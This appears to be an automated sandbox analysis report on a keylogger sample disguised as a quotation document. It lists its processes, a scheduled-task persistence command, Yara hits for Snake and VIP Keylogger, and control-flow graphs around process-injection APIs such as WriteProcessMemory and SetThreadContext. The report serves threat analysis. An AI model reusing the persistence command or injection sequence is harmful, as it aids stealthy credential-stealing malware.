
                                                                                                                                            Target ID:9
                                                                                                                                            Start time:07:05:34
                                                                                                                                            Start date:13/01/2025
                                                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                            Imagebase:0x7ff605670000
                                                                                                                                            File size:496'640 bytes
                                                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:10
                                                                                                                                            Start time:07:05:36
                                                                                                                                            Start date:13/01/2025
                                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmpA824.tmp"
                                                                                                                                            Imagebase:0xa20000
                                                                                                                                            File size:187'904 bytes
                                                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:11
                                                                                                                                            Start time:07:05:36
                                                                                                                                            Start date:13/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:12
                                                                                                                                            Start time:07:05:36
                                                                                                                                            Start date:13/01/2025
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                                            Imagebase:0xfd0000
                                                                                                                                            File size:2'625'616 bytes
                                                                                                                                            MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000C.00000002.4058029996.000000000708E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Has exited:false


                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:11.3%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:312
                                                                                                                                              Total number of Limit Nodes:20

                                                                                                                                              Control-flow Graph

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1b873c10e01e22168ec396af49b80a241969d71b87ff79375d8998bc29979e91
                                                                                                                                              • Instruction ID: 3e4bcb6c1b647f1310782e26b51e027e282ded87beb5715d951326f5fca3534f
                                                                                                                                              • Opcode Fuzzy Hash: 1b873c10e01e22168ec396af49b80a241969d71b87ff79375d8998bc29979e91
                                                                                                                                              • Instruction Fuzzy Hash: A8B3D534A116198FDB15EF64C894A99B3F2FF89304F1196E9D8486B361DB71AEC1CF80

                                                                                                                                              Control-flow Graph

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8ba46b8e567a5e902393226235d7768257e94aff623d29754039cc88972aa8d0
                                                                                                                                              • Instruction ID: 90137fc69e33248e071ed39ca5bd8c4d553634421ffd8c1a8d6c9886ed7b396d
                                                                                                                                              • Opcode Fuzzy Hash: 8ba46b8e567a5e902393226235d7768257e94aff623d29754039cc88972aa8d0
                                                                                                                                              • Instruction Fuzzy Hash: 44B3E634A116198FDB15EF64C894A99B3F2FF89304F1196E9D8486B361DB71AEC1CF80

                                                                                                                                              Control-flow Graph

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 83862e7ec8b9da64c0604d9228befcd5041aa0d87b25bf8187c9dba88e803a27
                                                                                                                                              • Instruction ID: ee1941234dd6c8eb4c0ac0bf8a1ef95b5d94e84fbe8dbecb83434520ea912fa5
                                                                                                                                              • Opcode Fuzzy Hash: 83862e7ec8b9da64c0604d9228befcd5041aa0d87b25bf8187c9dba88e803a27
                                                                                                                                              • Instruction Fuzzy Hash: 5683D534A11619CFEB25EF64C894A99B3B2FF89304F1156E9D8096B361DB31AED1CF40

                                                                                                                                              Control-flow Graph

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2517 6d0b1e4-6d0b285 2521 6d0b287-6d0b291 2517->2521 2522 6d0b2be-6d0b2de 2517->2522 2521->2522 2523 6d0b293-6d0b295 2521->2523 2529 6d0b2e0-6d0b2ea 2522->2529 2530 6d0b317-6d0b346 2522->2530 2524 6d0b297-6d0b2a1 2523->2524 2525 6d0b2b8-6d0b2bb 2523->2525 2527 6d0b2a3 2524->2527 2528 6d0b2a5-6d0b2b4 2524->2528 2525->2522 2527->2528 2528->2528 2531 6d0b2b6 2528->2531 2529->2530 2532 6d0b2ec-6d0b2ee 2529->2532 2538 6d0b348-6d0b352 2530->2538 2539 6d0b37f-6d0b439 CreateProcessA 2530->2539 2531->2525 2533 6d0b2f0-6d0b2fa 2532->2533 2534 6d0b311-6d0b314 2532->2534 2536 6d0b2fc 2533->2536 2537 6d0b2fe-6d0b30d 2533->2537 2534->2530 2536->2537 2537->2537 2540 6d0b30f 2537->2540 2538->2539 2541 6d0b354-6d0b356 2538->2541 2550 6d0b442-6d0b4c8 2539->2550 2551 6d0b43b-6d0b441 2539->2551 2540->2534 2543 6d0b358-6d0b362 2541->2543 2544 6d0b379-6d0b37c 2541->2544 2545 6d0b364 2543->2545 2546 6d0b366-6d0b375 2543->2546 2544->2539 2545->2546 2546->2546 2548 6d0b377 2546->2548 2548->2544 2561 6d0b4d8-6d0b4dc 2550->2561 2562 6d0b4ca-6d0b4ce 2550->2562 2551->2550 2564 6d0b4ec-6d0b4f0 2561->2564 2565 6d0b4de-6d0b4e2 2561->2565 2562->2561 2563 6d0b4d0 2562->2563 2563->2561 2566 6d0b500-6d0b504 2564->2566 2567 6d0b4f2-6d0b4f6 2564->2567 2565->2564 2568 6d0b4e4 2565->2568 2570 6d0b516-6d0b51d 2566->2570 2571 6d0b506-6d0b50c 2566->2571 2567->2566 2569 6d0b4f8 2567->2569 2568->2564 2569->2566 2572 6d0b534 2570->2572 2573 6d0b51f-6d0b52e 2570->2573 2571->2570 2575 6d0b535 2572->2575 2573->2572 2575->2575
                                                                                                                                              APIs
                                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D0B426
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 963392458-0

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2576 6d0b1f0-6d0b285 2578 6d0b287-6d0b291 2576->2578 2579 6d0b2be-6d0b2de 2576->2579 2578->2579 2580 6d0b293-6d0b295 2578->2580 2586 6d0b2e0-6d0b2ea 2579->2586 2587 6d0b317-6d0b346 2579->2587 2581 6d0b297-6d0b2a1 2580->2581 2582 6d0b2b8-6d0b2bb 2580->2582 2584 6d0b2a3 2581->2584 2585 6d0b2a5-6d0b2b4 2581->2585 2582->2579 2584->2585 2585->2585 2588 6d0b2b6 2585->2588 2586->2587 2589 6d0b2ec-6d0b2ee 2586->2589 2595 6d0b348-6d0b352 2587->2595 2596 6d0b37f-6d0b439 CreateProcessA 2587->2596 2588->2582 2590 6d0b2f0-6d0b2fa 2589->2590 2591 6d0b311-6d0b314 2589->2591 2593 6d0b2fc 2590->2593 2594 6d0b2fe-6d0b30d 2590->2594 2591->2587 2593->2594 2594->2594 2597 6d0b30f 2594->2597 2595->2596 2598 6d0b354-6d0b356 2595->2598 2607 6d0b442-6d0b4c8 2596->2607 2608 6d0b43b-6d0b441 2596->2608 2597->2591 2600 6d0b358-6d0b362 2598->2600 2601 6d0b379-6d0b37c 2598->2601 2602 6d0b364 2600->2602 2603 6d0b366-6d0b375 2600->2603 2601->2596 2602->2603 2603->2603 2605 6d0b377 2603->2605 2605->2601 2618 6d0b4d8-6d0b4dc 2607->2618 2619 6d0b4ca-6d0b4ce 2607->2619 2608->2607 2621 6d0b4ec-6d0b4f0 2618->2621 2622 6d0b4de-6d0b4e2 2618->2622 2619->2618 2620 6d0b4d0 2619->2620 2620->2618 2623 6d0b500-6d0b504 2621->2623 2624 6d0b4f2-6d0b4f6 2621->2624 2622->2621 2625 6d0b4e4 2622->2625 2627 6d0b516-6d0b51d 2623->2627 2628 6d0b506-6d0b50c 2623->2628 2624->2623 2626 6d0b4f8 2624->2626 2625->2621 2626->2623 2629 6d0b534 2627->2629 2630 6d0b51f-6d0b52e 2627->2630 2628->2627 2632 6d0b535 2629->2632 2630->2629 2632->2632
                                                                                                                                              APIs
                                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D0B426
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 963392458-0

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2633 24db261-24db27f 2634 24db2ab-24db2af 2633->2634 2635 24db281-24db28e call 24d87b8 2633->2635 2636 24db2b1-24db2bb 2634->2636 2637 24db2c3-24db304 2634->2637 2642 24db2a4 2635->2642 2643 24db290 2635->2643 2636->2637 2644 24db306-24db30e 2637->2644 2645 24db311-24db31f 2637->2645 2642->2634 2688 24db296 call 24db4f8 2643->2688 2689 24db296 call 24db508 2643->2689 2644->2645 2646 24db321-24db326 2645->2646 2647 24db343-24db345 2645->2647 2651 24db328-24db32f call 24dac54 2646->2651 2652 24db331 2646->2652 2650 24db348-24db34f 2647->2650 2648 24db29c-24db29e 2648->2642 2649 24db3e0-24db4a0 2648->2649 2683 24db4a8-24db4d3 GetModuleHandleW 2649->2683 2684 24db4a2-24db4a5 2649->2684 2654 24db35c-24db363 2650->2654 2655 24db351-24db359 2650->2655 2653 24db333-24db341 2651->2653 2652->2653 2653->2650 2657 24db365-24db36d 2654->2657 2658 24db370-24db379 call 24dac64 2654->2658 2655->2654 2657->2658 2664 24db37b-24db383 2658->2664 2665 24db386-24db38b 2658->2665 2664->2665 2666 24db38d-24db394 2665->2666 2667 24db3a9-24db3ad 2665->2667 2666->2667 2669 24db396-24db3a6 call 24dac74 call 24dac84 2666->2669 2670 24db3b3-24db3b6 2667->2670 2669->2667 2673 24db3d9-24db3df 2670->2673 2674 24db3b8-24db3d6 2670->2674 2674->2673 2685 24db4dc-24db4f0 2683->2685 2686 24db4d5-24db4db 2683->2686 2684->2683 2686->2685 2688->2648 2689->2648
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 024DB4C6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1631854951.00000000024D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_24d0000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4139908857-0

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2690 24d590c-24d59d9 CreateActCtxA 2692 24d59db-24d59e1 2690->2692 2693 24d59e2-24d5a3c 2690->2693 2692->2693 2700 24d5a3e-24d5a41 2693->2700 2701 24d5a4b-24d5a4f 2693->2701 2700->2701 2702 24d5a51-24d5a5d 2701->2702 2703 24d5a60 2701->2703 2702->2703 2705 24d5a61 2703->2705 2705->2705
                                                                                                                                              APIs
                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 024D59C9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1631854951.00000000024D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_24d0000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Create
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2289755597-0

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 2706 24d4514-24d59d9 CreateActCtxA 2709 24d59db-24d59e1 2706->2709 2710 24d59e2-24d5a3c 2706->2710 2709->2710 2717 24d5a3e-24d5a41 2710->2717 2718 24d5a4b-24d5a4f 2710->2718 2717->2718 2719 24d5a51-24d5a5d 2718->2719 2720 24d5a60 2718->2720 2719->2720 2722 24d5a61 2720->2722 2722->2722
                                                                                                                                              APIs
                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 024D59C9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1631854951.00000000024D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_24d0000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Create
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                              • Opcode ID: 431ebf1f116a0db6f74dd2bcb12aa1729cb6e4ecea54301ebed41661272c9f50
                                                                                                                                              • Instruction ID: 9a3c27af08c206dee1bc08d1ef84922898689000cb4eeb8ff14cbd82dcf48339
                                                                                                                                              • Opcode Fuzzy Hash: 431ebf1f116a0db6f74dd2bcb12aa1729cb6e4ecea54301ebed41661272c9f50
                                                                                                                                              • Instruction Fuzzy Hash: 9C41E2B1D0072DCFEB24DFAAC84479EBBB1BF88704F60806AD408AB251DB756945CF90

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 2723 7633f14-7634fc4 2725 7634fc6-7634fcc 2723->2725 2726 7634fcf-7634fde 2723->2726 2725->2726 2727 7634fe3-763501c DrawTextExW 2726->2727 2728 7634fe0 2726->2728 2729 7635025-7635042 2727->2729 2730 763501e-7635024 2727->2730 2728->2727 2730->2729
                                                                                                                                              APIs
                                                                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07634F5D,?,?), ref: 0763500F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636874825.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7630000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DrawText
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2175133113-0
                                                                                                                                              • Opcode ID: 608b3d0510df46619243a7a92867934d5f843f00900fbbf713a534417a7aa91b
                                                                                                                                              • Instruction ID: 3b478d7acc374ec6095913f3517febdc7ca8f3671cad707bc57d734125fd9185
                                                                                                                                              • Opcode Fuzzy Hash: 608b3d0510df46619243a7a92867934d5f843f00900fbbf713a534417a7aa91b
                                                                                                                                              • Instruction Fuzzy Hash: E631E4B59003499FDB10CFAAD884AAEFBF5FB48310F14842EE915A7310D775A954CFA4

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 2733 6d0af61-6d0afb6 2736 6d0afc6-6d0b005 WriteProcessMemory 2733->2736 2737 6d0afb8-6d0afc4 2733->2737 2739 6d0b007-6d0b00d 2736->2739 2740 6d0b00e-6d0b03e 2736->2740 2737->2736 2739->2740
                                                                                                                                              APIs
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D0AFF8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                              • Opcode ID: 950ace9c286d2a81eff58239ecb37ce1fc2540f12c167034fec3165b694fd854
                                                                                                                                              • Instruction ID: 2ed58498e804148a5316857546b349581269e3408e35471d268780e15a2d224b
                                                                                                                                              • Opcode Fuzzy Hash: 950ace9c286d2a81eff58239ecb37ce1fc2540f12c167034fec3165b694fd854
                                                                                                                                              • Instruction Fuzzy Hash: 5E2146B19003499FDB50DFAAC881BDEBBF5FF48310F14882AE958A7241D7789944CBA0

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 2744 7634f70-7634fc4 2746 7634fc6-7634fcc 2744->2746 2747 7634fcf-7634fde 2744->2747 2746->2747 2748 7634fe3-763501c DrawTextExW 2747->2748 2749 7634fe0 2747->2749 2750 7635025-7635042 2748->2750 2751 763501e-7635024 2748->2751 2749->2748 2751->2750
                                                                                                                                              APIs
                                                                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07634F5D,?,?), ref: 0763500F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636874825.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7630000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DrawText
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2175133113-0
                                                                                                                                              • Opcode ID: 392db762e79d2078bf1662beb025392f3514e17ae9b0f950c0c4c3f9efb4f1e3
                                                                                                                                              • Instruction ID: 4ef687fad07a16a934467fb91aab2b277c461f7cfde1bd26ba1334bccfb36241
                                                                                                                                              • Opcode Fuzzy Hash: 392db762e79d2078bf1662beb025392f3514e17ae9b0f950c0c4c3f9efb4f1e3
                                                                                                                                              • Instruction Fuzzy Hash: 9C3102B59003499FDB10CFAAD884AAEFBF5FB48310F14842EE819A7311D775A944CFA0

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 2754 6d0af68-6d0afb6 2756 6d0afc6-6d0b005 WriteProcessMemory 2754->2756 2757 6d0afb8-6d0afc4 2754->2757 2759 6d0b007-6d0b00d 2756->2759 2760 6d0b00e-6d0b03e 2756->2760 2757->2756 2759->2760
                                                                                                                                              APIs
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D0AFF8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                              • Opcode ID: d495576bec3d43b233909699eeacff79d3e4e13d6822422daac923a823cb68d2
                                                                                                                                              • Instruction ID: bf3945347c2588cb2f243402e67c3a6663df4c1772c2ba36a6fc23836780bc1f
                                                                                                                                              • Opcode Fuzzy Hash: d495576bec3d43b233909699eeacff79d3e4e13d6822422daac923a823cb68d2
                                                                                                                                              • Instruction Fuzzy Hash: D42127B59003499FDF50DFAAC881BDEBBF5FF48310F14842AE919A7241D7789954CBA0

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 2764 6d0a991-6d0a9e3 2767 6d0a9f3-6d0aa23 Wow64SetThreadContext 2764->2767 2768 6d0a9e5-6d0a9f1 2764->2768 2770 6d0aa25-6d0aa2b 2767->2770 2771 6d0aa2c-6d0aa5c 2767->2771 2768->2767 2770->2771
                                                                                                                                              APIs
                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D0AA16
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                              • Opcode ID: 1f9cf0ee6a92312b9efd494eaa2f2972e2809c8e7eef632337e9f6f8a67309b9
                                                                                                                                              • Instruction ID: 2f1c36aa11465051e649ae13096ca11872d1f6d4d9ecc6749b0b15ce3751dff0
                                                                                                                                              • Opcode Fuzzy Hash: 1f9cf0ee6a92312b9efd494eaa2f2972e2809c8e7eef632337e9f6f8a67309b9
                                                                                                                                              • Instruction Fuzzy Hash: 68213971D003099FDB50DFAAC885BEEFBF4EF48220F548429D459A7281C7789945CFA0

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 2775 24dcde0-24dd7d4 DuplicateHandle 2777 24dd7dd-24dd7fa 2775->2777 2778 24dd7d6-24dd7dc 2775->2778 2778->2777
                                                                                                                                              APIs
                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,024DD706,?,?,?,?,?), ref: 024DD7C7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1631854951.00000000024D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_24d0000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                              • Opcode ID: 3a007f61e98fd83a29b06073c032bd381160df4ee19f96287e99d02d65e21d11
                                                                                                                                              • Instruction ID: 43c91e5fb66dc183308d04d69e071fc9f34821ae96eeec6cb3a07de9b7e16d6f
                                                                                                                                              • Opcode Fuzzy Hash: 3a007f61e98fd83a29b06073c032bd381160df4ee19f96287e99d02d65e21d11
                                                                                                                                              • Instruction Fuzzy Hash: 4921D4B5900349DFDB10CFAAD884AEEBBF4EB48610F14845AE914A3350D374A954CFA4
                                                                                                                                              APIs
                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D0B0D8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1726664587-0
                                                                                                                                              • Opcode ID: e051638efb710be7ca749dc7d8c0e060764772281f30118fa7c475727f5090f7
                                                                                                                                              • Instruction ID: d96ed1dfa6fb83d263f3278e84da7855c6da27ba98e675ff836f08251344554a
                                                                                                                                              • Opcode Fuzzy Hash: e051638efb710be7ca749dc7d8c0e060764772281f30118fa7c475727f5090f7
                                                                                                                                              • Instruction Fuzzy Hash: E2212875D003499FDB10DFAAC881BEEBBF5FF48310F50842AE958A7241C7799905DBA0
                                                                                                                                              APIs
                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,024DD706,?,?,?,?,?), ref: 024DD7C7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1631854951.00000000024D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_24d0000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                              • Opcode ID: 747259a61335c2775653e322bc9dc2824fa6ca7a45582c00d5dc4d5f83512c25
                                                                                                                                              • Instruction ID: 5d38ea1f4c8eba189449b05d2e310828fa8e4e517e05e6d7d474e49f3f2ea44f
                                                                                                                                              • Opcode Fuzzy Hash: 747259a61335c2775653e322bc9dc2824fa6ca7a45582c00d5dc4d5f83512c25
                                                                                                                                              • Instruction Fuzzy Hash: 2921D2B5900349DFDB10CFAAD884ADEBBF4EB48610F14841AE958A7350D378A955CF61
                                                                                                                                              APIs
                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D0B0D8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1726664587-0
                                                                                                                                              APIs
                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D0AA16
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                              APIs
                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D0AF16
                                                                                                                                              Memory Dump Source
